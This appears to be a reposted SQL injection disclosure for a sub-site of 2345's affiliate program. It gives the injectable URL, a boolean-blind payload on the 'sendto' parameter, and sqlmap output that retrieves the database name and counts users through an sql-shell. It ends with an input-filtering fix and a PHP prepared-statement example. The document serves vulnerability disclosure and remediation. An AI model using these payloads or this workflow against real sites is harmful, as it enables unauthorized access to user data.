
SQL injection on a 2345 sub-site (input filtering required)

程序员文章站 2022-06-28 11:30:34

SQL injection on a 2345 sub-site

2345 Union (2345大联盟), union.2345.com

Injection point

https://union.2345.com/jifen/mall/index.php?category=&priceArea=&sendto=1%27%20and%20%271%27=%271

Vulnerable parameter: sendto

MySQL string-type injection (the value is quoted as a string in the query)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: sendto

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: category=&priceArea=&sendto=1' AND 5387=5387 AND 'UYEU'='UYEU

---

[13:17:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[13:17:55] [INFO] testing MySQL

[13:17:55] [INFO] confirming MySQL

[13:17:55] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.22

back-end DBMS: MySQL >= 5.0.0

[13:17:55] [INFO] fetching current database

[13:17:55] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[13:17:55] [INFO] retrieved:

[13:17:55] [WARNING] reflective value(s) found and filtering out

union2345

current database: 'union2345'



Impact: affects registered alliance users and involves the security of users' funds.

web application technology: Apache 2.2.22

back-end DBMS: MySQL >= 5.0.0

[13:25:25] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER

sql-shell> select count(*) from all_user

[13:25:38] [INFO] fetching SQL SELECT statement query output: 'select count(*) from all_user'

[13:25:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[13:25:38] [INFO] retrieved:

[13:25:38] [WARNING] reflective value(s) found and filtering out

4513

select count(*) from all_user: '4513'

sql-shell>

Fix:

Filter the input.
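As an added example that is not part of the original report or of 2345's own code: the report never shows the source of index.php, so the vulnerable function below is a hypothetical reconstruction of a query that concatenates the sendto parameter into SQL, placed beside a hardened version that filters sendto as an integer and binds it with a mysqli prepared statement. The table name all_user and database name union2345 come from the report; the column names and connection details are assumptions.

```php
<?php
// Hypothetical reconstruction of the vulnerable pattern (NOT 2345's actual code):
// the GET value is concatenated straight into the SQL text, so a value such as
// 1' AND '1'='1 rewrites the WHERE clause instead of being treated as data.
function lookupSendtoVulnerable(mysqli $db, string $sendto): ?array
{
    $sql = "SELECT id, name FROM all_user WHERE id = '" . $sendto . "'"; // injectable
    $res = $db->query($sql);
    return $res ? $res->fetch_assoc() : null;
}

// Hardened version: filter the input (only a non-negative integer is acceptable
// for an identifier) and bind it as a parameter, so the value can never change
// the structure of the query even if the filter were ever relaxed.
function lookupSendtoSafe(mysqli $db, string $sendto): ?array
{
    // Filter step: reject anything that is not an integer >= 0.
    $id = filter_var($sendto, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($id === false) {
        http_response_code(400);   // refuse the request rather than "cleaning" it
        return null;
    }

    // Prepared statement: query text and value are sent to MySQL separately.
    $stmt = $db->prepare('SELECT id, name FROM all_user WHERE id = ?'); // columns assumed
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage inside index.php; DB_HOST, DB_USER and DB_PASSWORD are placeholders.
$db = new mysqli('DB_HOST', 'DB_USER', 'DB_PASSWORD', 'union2345');
$db->set_charset('utf8mb4');   // fixed connection charset avoids multibyte escaping surprises
$user = lookupSendtoSafe($db, $_GET['sendto'] ?? '');
```

The same treatment applies to category and priceArea and any other parameter that reaches a query; a blind boolean probe like the one sqlmap used above works against any concatenated value, not just sendto.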